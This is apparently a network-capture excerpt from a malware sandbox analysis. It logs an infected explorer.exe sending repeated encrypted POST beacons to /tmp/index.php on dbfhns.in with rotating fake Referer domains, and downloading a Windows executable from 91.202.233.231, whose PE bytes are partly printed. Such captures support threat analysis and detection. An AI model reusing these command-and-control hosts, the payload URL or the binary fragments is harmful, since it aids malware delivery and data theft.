                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Host: 185.235.137.54


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.452655190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:58.584278107 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://mrnhbbwrygn.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 228
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:58.584278107 CEST228OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 47 38 c5 be
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vuG8g6pJLW_]oqXR-}P?(&eTs4Ip,M'L+1dzEVX>;kP,+aL+{
                                                                              May 26, 2024 10:22:59.613800049 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:59 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.452656190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:59.723663092 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://uhruuiuofju.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 236
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:59.723663092 CEST236OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 78 34 c7 e3
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vux4AqF+II] f`Fw$e3p>/Ry9-=YD2GJD,f(_ `:Vh*omokEDphP9
                                                                              May 26, 2024 10:23:00.708132982 CEST210INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:23:00 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13
                                                                              Data Ascii: #\ Z$jDm*w_c*^nUSssD


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.45265791.202.233.231802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:23:00.812727928 CEST184OUTGET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Host: 91.202.233.231
                                                                              May 26, 2024 10:23:01.764164925 CEST1236INHTTP/1.1 200 OK
                                                                              Date: Sun, 26 May 2024 08:23:01 GMT
                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                              Last-Modified: Sun, 26 May 2024 08:16:06 GMT
                                                                              ETag: "205e00-619570326fd80"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 2121216
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-msdos-program
                                                                              Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 0a 09 00 00 50 17 00 00 00 00 00 1c 18 09 00 00 10 00 00 00 20 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 [TRUNCATED]
                                                                              Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*P @ @`J"pD<CODE `DATA& (@BSS-P6.idataJ"`$6@.tlsZ.rdataZ@P.reloc<\@P.rsrcDpD@P ^ @P
                                                                              May 26, 2024 10:23:01.766345024 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: @Boolean@FalseTrue@,@Char@@SmallintX@Integerp@Byte@Word
                                                                              May 26, 2024 10:23:01.771362066 CEST1236INData Raw: 8b 06 8b 10 89 16 5e 5b c3 90 89 00 89 40 04 c3 8b c0 53 56 8b f2 8b d8 e8 9d ff ff ff 85 c0 75 05 33 c0 5e 5b c3 8b 16 89 50 08 8b 56 04 89 50 0c 8b 13 89 10 89 58 04 89 42 04 89 03 b0 01 5e 5b c3 8b 50 04 8b 08 89 0a 89 51 04 8b 15 e8 55 49 00
                                                                              Data Ascii: ^[@SVu3^[PVPXB^[PQUIUISVWUQ$]$PV;SS;uCCFF;CuCF;uVu3Z]_^[SVWU2C;rpJk;wb;uB
                                                                              May 26, 2024 10:23:01.771426916 CEST1236INData Raw: 4c 24 04 8b d7 2b 53 0c 8b 43 08 03 43 0c e8 db fc ff ff 83 7c 24 04 00 74 33 8d 4c 24 0c 8d 54 24 04 8b c5 e8 5d fb ff ff 83 7c 24 0c 00 75 b1 8d 4c 24 0c 8b 54 24 08 8b 44 24 04 e8 25 fd ff ff 8b 04 24 33 d2 89 10 e9 90 00 00 00 8d 4c 24 04 8b
                                                                              Data Ascii: L$+SCC|$t3L$T$]|$uL$T$D$%$3L$|$t4L$T$|$fL$T$D$$3Hk;u:;{5$q$8t($@C$@)C{u$3]_^[SVW$
                                                                              May 26, 2024 10:23:01.780780077 CEST1236INData Raw: f4 8b fa 8b f0 c6 04 24 00 8b c6 e8 96 fe ff ff 8b d8 85 db 0f 84 82 00 00 00 8b 6b 08 8b c5 03 43 0c 8b d0 8d 0c 37 2b d1 83 fa 0c 7f 04 8b f8 2b fe 8b c6 2b c5 83 f8 0c 7d 14 8d 4c 24 01 8b d6 2b 53 08 03 d7 8b c5 e8 c5 fb ff ff eb 11 8d 4c 24
                                                                              Data Ascii: $kC7+++}L$+SL$Fl$t4+cD$SS;s7+T$$$]_^[@SVWsp7y$VIDu$VI\[:
                                                                              May 26, 2024 10:23:01.780838013 CEST1236INData Raw: e8 05 18 00 00 eb 32 8b c3 e8 b4 fd ff ff 89 45 fc 33 c0 5a 59 59 64 89 10 68 27 23 40 00 80 3d 4d 50 49 00 00 74 0a 68 cc 55 49 00 e8 fd f0 ff ff c3 e9 ef 16 00 00 eb e5 8b 45 fc 5f 5e 5b 59 59 5d c3 8d 40 00 55 8b ec 51 53 56 57 8b d8 33 c0 a3
                                                                              Data Ascii: 2E3ZYYdh'#@=MPIthUIE_^[YY]@UQSVW3UI=UIufuUIEa3Uh$@d1d!=MPIthUIuUIUI%)UItEP|tUI
                                                                              May 26, 2024 10:23:01.790879011 CEST776INData Raw: 50 89 c8 ff 15 44 20 49 00 59 09 c0 74 19 89 01 c3 b0 02 e9 fa 00 00 00 89 10 89 c8 ff 15 40 20 49 00 09 c0 75 eb c3 b0 01 e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 3c 20 49 00 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 5f 3b 00 00 83 b8 00 00 00 00 00
                                                                              Data Ascii: PD IYt@ IutP< IYt@_;tQ;@3?;t1;@3SV;t;^;3F3^[@ ISV=PItPIu:
                                                                              May 26, 2024 10:23:01.790988922 CEST1236INData Raw: fe ff ff 8b c6 5e 5b c3 8b c0 56 57 89 c7 31 c0 8a 07 89 d6 31 d2 8a 16 46 00 d0 72 12 38 c8 77 0e 89 d1 8a 17 88 07 47 01 d7 f3 a4 5f 5e c3 88 c8 2a 0f 76 f7 88 ca eb e8 c3 33 c9 8a 0a 41 92 e8 65 fe ff ff c3 53 8a 1a 3a cb 76 02 8b cb 88 08 42
                                                                              Data Ascii: ^[VW11Fr8wG_^*v3AeS:vB@K[SVW11FG)wRt&9uDJtN_9u7JuZt:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&
                                                                              May 26, 2024 10:23:01.791007996 CEST1236INData Raw: 51 59 84 52 40 c8 a5 19 90 b9 a5 6f a5 55 40 3a 0f 20 f4 27 8f cb ce 58 40 84 09 94 f8 78 39 3f 81 5c 40 e5 0b b9 36 d7 07 8f a1 5f 40 df 4e 67 04 cd c9 f2 c9 62 40 96 22 81 45 40 7c 6f fc 65 40 9e b5 70 2b a8 ad c5 9d 69 40 d5 a6 cf ff 49 1f 78
                                                                              Data Ascii: QYR@oU@: 'X@x9?\@6_@Ngb@"E@|oe@p+i@Ix@=AGA+BkU'9p|B0<RB~QC/j\&Cv)/&D'DDYdEJzEb>9FFuuvHM9;5
                                                                              May 26, 2024 10:23:01.798455000 CEST1236INData Raw: b7 0f 51 83 c7 02 f2 66 af 74 0a 59 8b 76 dc 85 f6 75 e3 5f c3 58 01 c0 29 c8 8b 74 47 fc 5f c3 8b c0 50 51 8b 00 e8 c7 ff ff ff 59 58 74 02 ff e6 59 e9 63 f5 ff ff c3 8b c0 eb 02 8b 00 39 d0 74 08 8b 40 dc 85 c0 75 f3 c3 b0 01 c3 90 83 c0 c4 8b
                                                                              Data Ascii: QftYvu_X)tG_PQYXtYc9t@u@@@Vf2ftfsPpXt^^aSVW11ptf>N8tfOu@u\12uIuF_^[SVW11p
                                                                              May 26, 2024 10:23:01.798532963 CEST1236INData Raw: 80 3d 2c 20 49 00 00 76 1e 80 3d 28 20 49 00 00 77 15 8d 4c 24 04 50 51 e8 65 d9 ff ff 83 f8 00 58 0f 84 9f 00 00 00 89 c2 8b 44 24 14 8b 48 0c eb 27 80 3d 2c 20 49 00 01 76 1e 80 3d 28 20 49 00 00 77 15 50 8d 44 24 08 52 51 50 e8 31 d9 ff ff 83
                                                                              Data Ascii: =, Iv=( IwL$PQeXD$H'=, Iv=( IwPD$RQP1YZXtm1dSPRQT$(HVjPh9@RPI[|$()oG9@D$c#v)AD$T$@tJBD:@SVWUj


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.452658190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:23:03.796266079 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://gdrusktiywhw.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 181
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:23:03.796266079 CEST181OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 03 6b 2c 90 f4 76 0b 75 75 23 e0 f8
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA ,[k,vuu#^WmvBMe%LT7GoDT$@tC'LM>( j<3U}
                                                                              May 26, 2024 10:23:04.997185946 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:23:04 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.452693190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:24:18.309649944 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://dswkxseehrq.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 278
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:18.309684038 CEST278OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3e 4a a2 ad
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu>Js_"`WIH,:WRxHc^'To[`Ku4@*1Pw}cnbSGVWhGO(]6j"/
                                                                              May 26, 2024 10:24:19.314668894 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:19 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.452694190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:24:23.638001919 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://etlthdykpik.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 218
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:23.638021946 CEST218OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7b 33 a4 a5
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu{3GpXu(dR4^m{y]/^,3>RD+=sEOK{-YcP?_#Gh
                                                                              May 26, 2024 10:24:24.615850925 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:24 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.452695190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:24:28.877506018 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://urrnadxnpwvv.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 124
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:28.877542973 CEST124OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 61 00 b4 e9
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vua&\wUy43U,>
                                                                              May 26, 2024 10:24:29.891668081 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:29 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.452696190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:24:36.577363968 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://hnoddeyuysdltft.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 131
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:36.577398062 CEST131OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 72 36 ff 88
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vur6aW1my-t)G@9jf2v
                                                                              May 26, 2024 10:24:37.609268904 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:37 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.452697190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:24:41.911621094 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://djnjnheylgenw.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 368
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:41.911622047 CEST368OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 30 35 a8 b5
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu05OPZ`P:}ep O6fnR2&{J.:/CO_Qs`h)DNZ8&?pu;3W[6y|OY?x0qI4i29p
                                                                              May 26, 2024 10:24:42.969783068 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:42 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.452698190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:24:47.097794056 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://mvirbkubtmy.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 319
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:47.097794056 CEST319OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 3a d3 eb
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vuf:ItO[$ m2ZL9e1iG10e,NY;1$lP.j*G&?8\!j2EGh SMi"
                                                                              May 26, 2024 10:24:48.101244926 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:47 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.452736185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:24:58.756613970 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://ukxbtouqvjwpgrb.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 188
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:24:58.756638050 CEST188OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 35 1b d0 a9
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu5OzmwPsH[)1[:eO(W(AH)_\40|o2=(A?-
                                                                              May 26, 2024 10:24:59.751699924 CEST151INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:24:59 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 03 00 00 00 72 e8 84
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.452737185.18.245.58802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:25:03.657069921 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://lttuitxyemp.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 159
                                                                              Host: dbfhns.in
